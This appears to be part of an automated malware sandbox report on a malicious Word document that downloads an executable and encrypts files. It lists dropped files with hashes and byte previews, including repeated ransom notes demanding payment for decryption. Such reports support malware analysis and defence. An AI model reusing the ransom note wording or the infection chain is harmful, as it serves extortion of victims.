I..`....yx.%O!L."..^..T........B.uA........,....".x..g.n;...0y?..R.pd.Y.h.u.Io4./.?...."...h...b.._..o<.....h.!B.z.kb.I..-..a..o6...,....}..[>..R....B/q.1UM..d:I9.8.F...;..x.}={.<........x....F...g-...X^\.......^.G".*&

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	724480
Entropy (8bit):	5.829477474491446
Encrypted:	false
MD5:	0F841C6332C89EAA7CAC14C9D5B1D35B
SHA1:	23ACD12DD10615C5F0604E842D755A0EE3F4B42E
SHA-256:	806FC33650B7EC35DD01A06BE3037674AE3CC0DB6BA1E3F690EE9BA9403C0627
SHA-512:	F6C65CA0D9337C6E98B25862262378583F04B665883866C5A3AE3F60E53BADA96C027CF0F7406E705E50B4C831C5C6635327518B377850F080284CE1E418DDF8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 5%, Browse
Joe Sandbox View:	Filename: VERDI (002).doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....t.].....................~....................@..........................P......r........................................ ..P.......,w..................................................................@...H.......,............................text...R\|.......~.................. ..`.data...@................................rsrc...............................`...........E....0...................... ...........V....@...................... .....U ....:U-......H:...........kernel32.dll.comctl32.dll.GdiPlus.dll...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\152095A0.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ms-windows metafont .wmf
Size (bytes):	664
Entropy (8bit):	3.6233409999696087
Encrypted:	false
MD5:	75B7BBFFA1F66AB21BF7FB02AD1A7C47
SHA1:	01FCD26A68819CA45F3B4F297E856A53F130F8AB
SHA-256:	961A0D49CE3F5944A9752A59C457299D545F2B0865CCEAC55450B3213C8603DD
SHA-512:	C631E831D6F0B54E88EF2EC260EE9C0ECF62269F8FDA479516247F95B2C304493832A9CCED830888AEAD2D5474542F8604E321DD432FFC0557574077EEA0062F
Malicious:	false
Preview:	.......0...L..O............A...............&.................0.......L.......&.................&.............TNPP...b=P9.......&.....TNPP..........&.................&.....TNPP......................0.............................".....-.....................-...................".....-.....................-...........................L...0...........3.....-.......-...............................4...N...........@.....3.".....-.........N.........,.......-.......-...............'.......-.......-...............4...N...........@.....3.".....-.........N.........,.......-.......-...............'.......&.....TNPP....................&.................-.......-.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2102E013.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\021"
Size (bytes):	660
Entropy (8bit):	3.4864083108397743
Encrypted:	false
MD5:	F8BD7D583381F0314351C102499CB9A9
SHA1:	5E75BB6938D367C8DE525C236CD18E255D77A4E1
SHA-256:	CCC6BF57EBA3FA18AE6260BD69741184838FCABA539C75C850223354FE782FF7
SHA-512:	F160EBCCEB2FBD3D09525331ABE9EB81A757A9EE7918676B2B0BACFF46294E03D79377EEAD4CFA73EC43E65748A4535FAE36B26C15C90DECC50A02006D74F35D
Malicious:	false
Preview:	......................&.................0.......L.......&.................&.............TNPP...b=P9.......&.....TNPP..........&.................&.....TNPP......................0.............................".....-.....................-...................".....-.....................-...........................L...0...........3.....-.......-...............................4...N...........@.....3.".....-.........N.........,.......-.......-...............'.......-.......-...............4...N...........@.....3.".....-.........N.........,.......-.......-...............'.......&.....TNPP....................&.................-.......-...............A...........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AAE55921.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 17 x 65536 x 0 +4 "\021"
Size (bytes):	642
Entropy (8bit):	3.533361200718634
Encrypted:	false
MD5:	4F03B86E4D6631C26FF5FFFC7332BE1D
SHA1:	14952A78EA51DF67D5B5B6C6B4DE3D96BA7935BD
SHA-256:	83F4EA26254D69825486BFFD1D400217AAC7245C5C48FE5ACC3CCDEA173C4851
SHA-512:	4BED29B66444D826E89589B55DD786758FF68FCD2DAF8296703D4443EDB991FFFCE563E20DB22BFB34FDB488638BBB43252392B6C105D12E721329ADC2774632
Malicious:	false
Preview:	......A...............&.................0.......L.......&.................&.............TNPP...b=P9.......&.....TNPP..........&.................&.....TNPP......................0.............................".....-.....................-...................".....-.....................-...........................L...0...........3.....-.......-...............................4...N...........@.....3.".....-.........N.........,.......-.......-...............'.......-.......-...............4...N...........@.....3.".....-.........N.........,.......-.......-...............'.......&.....TNPP....................&.................-.......-.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C361ACAE.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	[TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=3, software=Adobe Photoshop CS6 (Windows), datetime=2019:10:18 12:40:39], baseline, precision 8, 620x100, frames 3
Size (bytes):	101830
Entropy (8bit):	7.661630314063406
Encrypted:	false
MD5:	7C63864272B58278FD357953877ABF78
SHA1:	1E996887756078179CD657DFFA70D973731B7018
SHA-256:	12FB089F3D9BB5402993993C4DEA059D5F92EEBF0DFD6FC52036976262406BFD
SHA-512:	B93D73B79B5F4B6548309795CB63226E125D0BF0EDF92C6411CBB07C7EBF808344DDDC34B0AF7D7563924F381A3BBE00CD7B77B24D6DD468E307152E2E7BB2E6
Malicious:	false
Preview:	......Exif..MM.*.............................b...........j.(...........1.........r.2...........i................q...'...q...'.Adobe Photoshop CS6 (Windows).2019:10:18 12:40:39..........................l...........d...........................................&.(.................................].......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF880FFD.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\021"
Size (bytes):	660
Entropy (8bit):	3.4864083108397743
Encrypted:	false
MD5:	F8BD7D583381F0314351C102499CB9A9
SHA1:	5E75BB6938D367C8DE525C236CD18E255D77A4E1
SHA-256:	CCC6BF57EBA3FA18AE6260BD69741184838FCABA539C75C850223354FE782FF7
SHA-512:	F160EBCCEB2FBD3D09525331ABE9EB81A757A9EE7918676B2B0BACFF46294E03D79377EEAD4CFA73EC43E65748A4535FAE36B26C15C90DECC50A02006D74F35D
Malicious:	false
Preview:	......................&.................0.......L.......&.................&.............TNPP...b=P9.......&.....TNPP..........&.................&.....TNPP......................0.............................".....-.....................-...................".....-.....................-...........................L...0...........3.....-.......-...............................4...N...........@.....3.".....-.........N.........,.......-.......-...............'.......-.......-...............4...N...........@.....3.".....-.........N.........,.......-.......-...............'.......&.....TNPP....................&.................-.......-...............A...........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{45CA0382-31BF-4740-A157-03EE0391AB78}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	5676
Entropy (8bit):	3.937000407733002
Encrypted:	false
MD5:	2AAA1E4C25B192D914DA88888E99040E
SHA1:	35AA4DF8A21869EEC789DC4A0024A105AF940216
SHA-256:	E550D0B71E71351B0FBA53CA64B054F9F7A0FD8A67F595A670E0C6FE8C881622
SHA-512:	085DB7D79FE76984C7FC698FE8BDADFE904414441B16565637D1276EB544F53AED6C6B758D3508EE4C8BFBFB2E06EA285EB1B102588D6759799129D98AB71CF1
Malicious:	false
Preview:	../...../...Q.u.e.s.t.o. .f.i.l.e. ... .p.r.o.t.e.t.t.o. .c.o.n. .c.h.i.a.v.e. .R.S.A.....A.b.i.l.i.t.a. .i.l. .c.o.n.t.e.n.u.t.o. .p.e.r. .v.e.d.e.r.e. .q.u.e.s.t.o. .d.o.c.u.m.e.n.t.o.........O.t.t.o.b.r.e. .1.9.,. .2.0.1.9.....-.-.-.-.B.E.G.I.N. .R.S.A. .P.R.I.V.A.T.E. .K.E.Y. .B.L.O.C.K.-.-.-.-.....V.e.r.s.i.o.n.:. .B.C.P.G. .C.#.v.1...9...2...0.....................................................................................................................................................................................Z...........................0...b...d...f..."...$...&...(...,...........................................................................................................................................................................................................................................................................................................gdjK..........^...gdjK.......$.......<.^...`.<.a$.gdjK.......$.a$.gdjK.......$.......<.^...`.<.a$.gdjK......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BA4F35A2-3A04-4FE4-9671-3F028B08152F}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C814969B-A253-4DA9-8878-9A964630E65F}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\000.bmp Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 32
Size (bytes):	5242934
Entropy (8bit):	2.56217697284798
Encrypted:	false
MD5:	C12B1B88584E86B11A430B0E5BE2E825
SHA1:	6560CF01178405A8D0CCD27C757D792DBB4683F3
SHA-256:	7A7379366BA32D9B98BAE1FE28B20A6225393BD553815951BAA7A3C7DFF518D1
SHA-512:	1D3DB14E1493390F4BC2D37DC5E40F31DBB6BE182A41EB81DF841B600B8FBCAB4AF2601003741EB15AF0982F94AC682B88D673160E94E0A936C98DE59DD71A53
Malicious:	false
Preview:	BM6.P.....6...(............. .......P.................. ...........#...'...#...................................#..............."...............................'...............&...............$...............#...............!...................$...'...#......."...&...................................................%........... ...................................!...................#...........&...........!..........................."...........%..............................."...&...................................................%...........................................................$... ...............&.......%.......%...............................................................'.......&.......%.......%.......$.......#...'...#..................................................."...........%.......$...........................&................... ...#.......................!...........$...................&...........!...................$...................................$... ....

C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162688
Entropy (8bit):	4.378024619424269
Encrypted:	false
MD5:	8CF709BFB41095C3892F34706F59346D
SHA1:	BF8F0C4DC894623588DC745CD7D27F95AB136CBB
SHA-256:	5C56F84693B66EA1FB6BBFADA143CB49F74AC7E9C40BFE86FF22C12BBC5419A6
SHA-512:	0B38F2FFFBF958836D25FC81FB7BB41C0BD5F7F3F7D37735921F9F73D864BAE85E66A633928E5ECA15464988F8C030EF30545924161D5904EBBFBE1048C2A00D
Malicious:	false
Preview:	MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......l...8..........................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................

C:\Users\user\AppData\Local\Temp\Word8.0\INKEDLib.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	124300
Entropy (8bit):	4.886595187764134
Encrypted:	false
MD5:	3A6F5E7AF9B8EA679DA4F09B607010DA
SHA1:	E716119021C0971A61374C8A00C1700C94D62781
SHA-256:	F3214BB9D92A6C8479B4F8CACE7EEA144CC88DA5D39077419EAEB9A671BC36B5
SHA-512:	CA924B5621FD0080672A4718A33A00636850E2E38FE0D91F917C3C10FFBA17BCF1F39ECB16755805D74CAB544C2D3EF3DFC87B94F0D3F3107D6F100A08E36066
Malicious:	false
Preview:	MSFT................Q...........o...............h...W)...... ....... ...........\|.......d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*.......6..\+..........................D...4...........0... ............................................................x..8W...............a...................................................................................................... !..................x....................................D....................................... !..................P..........8..................,............................................... !..........0.............$.0...

C:\Users\user\AppData\Roaming\.jre\COPYRIGHT Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.262940473434978
Encrypted:	false
MD5:	4FACB7014CA368059E27A0FA55B5AF05
SHA1:	C4D10088068C99F81C4BBA9E16E0123062C47C41
SHA-256:	BF2E5D040A97E92504D3B7B77183EE964F2C26578A61748866E20F8680EBA09D
SHA-512:	EAF59F5D166E1D508A2BCB1A1077FF4720E88F2A2924D5B580A28F20AEAF4799C38ADEE064820906C90D7CEE64F7FDEFCF786143E9CEC6689ED5AF00A0AB8B8B
Malicious:	false
Preview:	o(..g!.+.1C..........v1?.l9yG.BT..5.....P..........!....A...$.r..a.e..jEB......9r`3....TI'.\.{.x......s.8.Y........h.....v_P#.mc.k.}R....O.].nr.....[.7....+..{....L..k... .t._...V...g..Q.IG'........_........Pj.WWk..KJ..z.3.....P.\|r.u....f.af

C:\Users\user\AppData\Roaming\.jre\bin\client\Xusage.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.224535301134155
Encrypted:	false
MD5:	257039FBBD61059CC9C09DD2BE17F724
SHA1:	661D06E85F4E8DEAB7D48F1677EE73E4557F016E
SHA-256:	74069A5FB82E30A5D17115B5F56268882BB531D660673454177E1B034739FF8D
SHA-512:	F4141691AAB63BF0EB835384C120910106BAF035CAC857EB858660383A3FDC7D6163D15D6DC7ED202FA1BC32690CF1D849CE629E98AFC569AC76989D5C686033
Malicious:	false
Preview:	2.(m.H.....R9V....m.....@.....Z+...m..]r.@/.!..H..TQe2..7.m...P...N.P]....^.......NJ...%.L....<.b\|h.W.*o..H~.B.....OFN3..v.`?.......r.B.0..^...MbQ...g)n.w.t@.b....F..^..z....O..re\.T..r...I.....[..d...N........[M.T ..........Qt...%..Xl...:Y..S....f.af

C:\Users\user\AppData\Roaming\.jre\bin\client\classes.jsa Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	12976392
Entropy (8bit):	7.999986382123516
Encrypted:	true
MD5:	169D9FE6AA2D5149EE72C2F0B6150DF6
SHA1:	EEEC371E0A48B4CD583950872585020D5E798466
SHA-256:	700A734057ED0FBEB26F1770CE9C1F8227B9562954060EE52AE972F3CA101D11
SHA-512:	1A0AB7445FD6B7BABA1DB4D787C4F7984D92775BAA649E26A6A18AA64498E9E4F080388BA91E9AD90C830F6CE9C9C9165FAF7AA3FD16A2972F5A309CBF4BC606
Malicious:	false
Preview:	.d.`...F..o.`....7.P.p.P...:.f..h.C92...X.u.F..4..Pl.=...`......w.D...Vt..[...KYh.3..ig..=$..C....UQ.......l.g......K.^.Y....Mj.. .ray..Y{...^a...q.[..%....HS..]...5........9wj-.{..v...>..Ok..%N......Q........sD...!...t..Q...@O.3.o...`...%.@..F..ap.k.,.n......JV.IX........\.I..K`C<..<6.......[.0z...<>.=...Lr..j!:-.3...y..V......6..5.V$..x.?.....S.M..6Zr;.....fQ3. .y"...@R.<.~..K@.......r....BX.!0@yE.6ZR....dZx!hP...Y.F.....m:..+...^.4Hg4.......k.e...+a...m.Q.m.....2.. ....B....ZI..[5U$...._.4.`.i.M....0h...-~..Zs.(..a...ik.r".....R`4;..;P..i..vR.V..+/e..<.J..1........P!.i.H.I.+.'.}..<....\>....6..a.@.,lD....h.d.*..g`..:.f..)......L."..w......8I$e........gB.{..p9.t.m.\|@.i5/..k.....\SZ..?.DW%$A]..U..=.p5Fd9P.g.4.24..a.. sLt%.O.o.nK6..M.w.a..m^..d...\K^..3a.....T_.f..~=.../.s.f."......+.]Gs..r.....q....H.....$._..U.v....d..a...m.E...F:..Y.\.Qh.@..E......y4L....LAA.y..........9.du..S.!y..i_._.&.hx..>.T...`......N..!.z.v...+m.........G....

C:\Users\user\AppData\Roaming\.jre\bin\dtplugin\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\.jre\bin\javacpl.cpl Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.077456053318583
Encrypted:	false
MD5:	9FB5A0EEFFA7F56C802317630FCF57AA
SHA1:	12F99A1AD925601E1C052A2DBA384E4FB38CE71B
SHA-256:	2EB65245A262B58CD1B30D7F48582368B8952C674E9FE5E853B642D54F70A126
SHA-512:	FF2EF7DCCA58DE49A0E36A841C331970E16166E27457AFFCC49ECE5773FD46FF00EA2271F6C1EBD7A51E59DE8FB86AB0AE26AB604D25D3D8F0B2720E6730A709
Malicious:	false
Preview:	4R..pb.0~.k..H.......6Q.6..0.4......L...0..+zA."..p..4.2p}..J...pB...En........7b+......T..D...[.4R%..wIp....0D..@88.3hf.%/......I.....6]....d7`C...$.MZ.CE_..U@E.e?O....[....f..R..%...8[.S....N. ..A...Q.S..(L.f.....-.....N6U......;.1....<k..R.....f.af

C:\Users\user\AppData\Roaming\.jre\bin\plugin2\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\.jre\lib\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\.jre\lib\accessibility.properties Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.190933917030833
Encrypted:	false
MD5:	2915F4649691F929CBE48FF31A238DB8
SHA1:	B06C96103E92F7A0209638FD50AEB0DA9A8EA8F9
SHA-256:	E6A2794C219EBD631158337E308D0F5A02BE3BF277C9F84981157F668934BDBF
SHA-512:	94B41D2278C8F0F3D0EA3E45108CA9586F96DAA197D0A3AB72D0EC0C0A83EC713EF541CF405700F926689D4E37C105894CAECCF50E68271A00C482DABA706FDE
Malicious:	false
Preview:	......2.......X.&p.i...z........5.N...m.~.K..~..~.........@hY.(.T..z......H...c.G..<....y...($...k..d....Cz..v/...[..j...E..m..G..u.....p!j...8..z..yK...F(....,MskI..s....N...6>!.o..`..9.P...y.mR.....`...5J.....jl..:..K.z..7R7ff..Df.1...(.("SD....f.af

C:\Users\user\AppData\Roaming\.jre\lib\applet\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
